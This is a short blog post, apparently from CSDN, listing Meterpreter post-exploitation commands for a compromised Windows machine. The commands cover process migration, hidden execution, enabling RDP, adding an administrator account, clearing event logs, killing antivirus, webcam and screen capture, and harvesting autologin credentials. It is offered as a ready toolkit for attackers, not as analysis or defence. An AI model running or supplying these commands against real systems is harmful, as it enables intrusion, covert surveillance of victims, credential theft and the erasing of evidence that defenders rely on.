After the penetration stage

Playing the message box

msg /server:127.0.0.1 * "hello"

Process migration

Manual migration:

View the process ps
to obtain meterpreter process PID getpid
migrate to the specified process PIDmigrate 1234

Automatic migration
run post/windows/manage/migrate

Running processes

Executes the specified program in the target system using execute:

execute -f /usr/test.exe [options]

Optional parameters:
-H: Create a hidden process

Enable RDP

run post/windows/manage/enable_rdp

Adding an administrator account

run getgui -u hack -p hack

Clear Log

clearev

View System Information sysinfo

Check whether the virtual machine run post/windows/gather/checkvm

Shut down the target machine shutdown

View Runtime idletime

Close soft kill run post/windows/manage/killav

Scan cameras: webcam_list

Snap a photo :( saved in the root directory)webcam_snap

Live mode: webcam_streamAccess Go to URL

Users logged listedrun post/windows/gather/enum_logged_on_users

Crawl automatically log the user name and password

run windows/gather/credentials/windows_autologin

Screen capture
screenshot

or

load espia

screengrab
Published 27 original articles · won praise 2 · Views 3915

Guess you like

Origin blog.csdn.net/s0mor/article/details/99646089